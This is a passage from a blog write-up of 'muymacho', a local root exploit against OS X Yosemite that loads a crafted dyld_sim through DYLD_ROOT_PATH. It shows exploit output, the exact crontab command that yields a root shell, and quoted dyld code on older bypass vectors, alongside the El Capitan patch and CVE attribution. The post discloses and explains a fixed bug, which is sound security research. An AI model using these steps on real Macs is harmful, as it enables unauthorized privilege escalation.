    LC_SEGMENT_64: segment 0x1f    vm_addr: 0x7ffe4fc1d000
[+] building payload
[+] dyld_sim successfully created

To exploit enter:
  DYLD_ROOT_PATH=/Users/user/tmp crontab

user@yosemite:~/tmp$ DYLD_ROOT_PATH=/Users/user/tmp crontab
bash-3.2#

Patch

El Capitan made many changes to dyld. In particular, the validation on the dyld_sim file is much more strict, closing the vulnerability muymacho uses. There are various checks to ensure that consecutive segments have appropriate fileoff and vmaddr values.

At the time of this post, Apple has not yet released El Capitan source code. The changes can be examined in IDA Pro.

Conclusion

This concludes the majority of the post (be sure to check out the super sekret debug shellcode). We’ve discusses a vulnerability from discovery, through potential problems, to exploitation. The complete exploit is on github.

I hope this post has been helpful. It was a fun bug and I very much enjoyed writing muymacho.

Thanks to everyone (Pete Markowsky, Ian Melven, Josha Bronson) that reviewed this post. Also thanks to @iOn1c for posting his challenge which led to finding this bug.

super sekret debug shellcode

Sometimes I am curious as to which segment was used in exploitation as well as the various ASLR addresses. In practice, the actual addresses are irrelevant. I included a debug shellcode that provides this information back to the user.

The super sekret debug shellcode is selected by passing a “-d” command line switch. After muymacho returns with the hashtag symbol (aka #), be sure to type in:

echo "$MUYMACHO"

debug infoz

Feel free to take a look a the debug shellcode in muymacho. Debug information is passed through the execve call in an environment variable.

Appendix

10.10.4 and prior

Mac OS X 10.10.4 and prior have an additional DYLD_ROOT_PATH vector. This section discusses the older vector and 10.10.5 update. OS X 10.10.4 uses dyld.cpp from dyld-353.2.1.

Early in useSimulatorDyld() code, there is a check to verify that dyld_sim is owned by root.

// verify simulator dyld file is owned by root
   struct stat sb;
   if ( fstat(fd, &sb) == -1 )
      return 0;
   if ( sb.st_uid != 0 )
      return 0;

While auditing the function, it becomes apparent that the code signing requirement is optional. Thus, the only requirement is a root owned non signed dyld_sim which isn’t too high of a barrier. useSimulatorDyld() will gladly load it and execute it.

10.10.5 update

The 10.10.5 update brought fixes for the DYLD_PRINT_FILE vulnerability (CVE-2015-3760 credited to: beist of grayhash, Stefan Esser). It also included changes to useSimulatorDyld() function likely due to the discovery of the previous vector.

dyld_sim no longer needs to be owned by root, however code signing is now mandatory. The following code snippet is from dyld.cpp.

int result = fcntl(fd, F_ADDFILESIGS_FOR_DYLD_SIM, &siginfo);
   if ( result == -1 ) {
      dyld::log("fcntl(F_ADDFILESIGS_FOR_DYLD_SIM) failed with errno=%d\n", errno);
      return 0;
   }

A new fcntl command was added in 10.10.5 specifically for dyld_sim. The following excerpt is from /usr/include/sys/fcntl.h.

#define F_ADDFILESIGS_FOR_DYLD_SIM 83   /* Add signature from same file, only if it is signed by Apple (used by dyld for simulator) */

dyld_sim needs to be signed by Apple; a developer certificate is not sufficient.

CVE number

It is somewhat unclear what CVE number this bug has been assigned. The El Capitan security update lists the following bug credited to beist:

Dev Tools

Available for: Mac OS X v10.6.8 and later

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue existed in dyld. This was addressed through improved memory handling.

CVE-ID

CVE-2015-5876 : beist of grayhash

The same CVE is also listed on the iOS 9 and watchOS 2 update. A cursory examination of dyld from iOS 8.4.1 did not reveal the same vulnerability muymacho exploits. I could be mistaken and will update this post if that is the case.